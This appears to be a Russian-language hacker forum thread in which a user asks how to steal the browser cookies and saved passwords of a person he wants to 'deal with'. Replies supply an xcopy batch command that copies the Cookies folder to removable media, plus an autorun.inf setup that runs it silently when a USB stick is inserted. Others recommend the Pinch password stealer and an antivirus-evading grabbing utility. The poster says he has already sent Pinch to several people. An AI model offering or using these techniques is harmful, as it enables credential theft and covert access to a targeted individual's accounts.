Парни всем привет... ) Парни у меня есть вопрос вот тока в какой раздел его писать так и непонял..... ( Поэтому решил написать тут..... Есть один нехороший человек с которым надыть разобратся в виртуале..... Наскока я знаю он все пасы сохраняет на своей машине во всем известных "Cookies" Парни Плиз обьясните как можно стащить у него эту папку Я знаю то что можно както все "Cookies" стащить через какойто сплойт для IE или я ошибаюсь ... Я еще хотел узнать может можно "Cookies" стащить через какойнибудь *.exe - шник т.е. написать *.exe - шник в Delphi так чтобы наример когда к этому челу придешь с винтом и запустив этот *.exe - шник Cookies скапировались на мой винт. Возможно ли это? А может какимнить Трояром можно у него их выпалить?
cmd -> xcopy /? Например для IE: сделай файл в блокноте и сохрани с расширением bat При запуске этого бат-файла папка с кукисами скопируется на дискету. P.S. Пути, где хранятся кукисы могут быть другими, так что можно прописать все возможные... Можно вообще автоматизировать: На флешку записать этот батник и файл autorun.inf, в котором прописан запуск этого батника, тогда, если служба определения оборудования оболочки не отключена в XP, достаточно только вставить флэшку и кукисы скопируются на неё автоматом...
А если он не знает диру к кукам. Проще пинча запустить с флешки он точно все пассы тебе отдаст, ну если он их конечно сохраняет. Лучше соц инженерия =)
Хочу добавить. Открываеш блокнот пишиш xcopy "c:\Documents and Settings\Администратор\Cookies" a:\Cookies и сохраняеш как имя-файла.bat
Насчет IE я возможно и разберусь с БАТ-вайлом А вот насчет Флешки можно поподробнее плиз Как я понял это что-то типо как раньше "МАСЯНЯ" была да? Если да то как эту флушку изменить и что с ней вообще необходимо сделать для того что бы скомуниздить КУКИ Дирку эо непроблема узнать. Pinch and Xinch надо склеить с флехой? А вот насчет Pinch-a and Xinch-a есть ЫШО вопросик почему когда я их скомпилил и скинул нескольким людям допустим 4-м мне отчеты пришли тока от 2-х? (((
Делаешь файл на флешке (в корне), обзываешь autorun.inf вот его содержимое: [autorun] OPEN=AUTORUN.EXE - у тебя твой_файл.bat ICON=AUTORUN.EXE - тут откуда иконку брать Вместо AUTORUN.EXE должен быть твой батник вот и всё...
Если всё-таки имеешь доступ к компу, то тогда уж проще скопировать вручную куки на дискетку. А вот есть одна утилита , которую советую попробовать применить. Может запускаться скрытно или в оконном режиме (без параметров, но тогда сам указываешь куда сохранять). Наверно и к авторану прикрутить можно, только там путь сохранения нужно указывать через параметры коммандной строки. Утилита не палится почти всеми антивирями.
Кстати на XP SP2 автозапуск с флеш-носителей отключен теперь по умолчанию (было раньше, ИМХО в XP и XP SP1), так что надо сначала в реестре разрешить... ищи инфу в инете...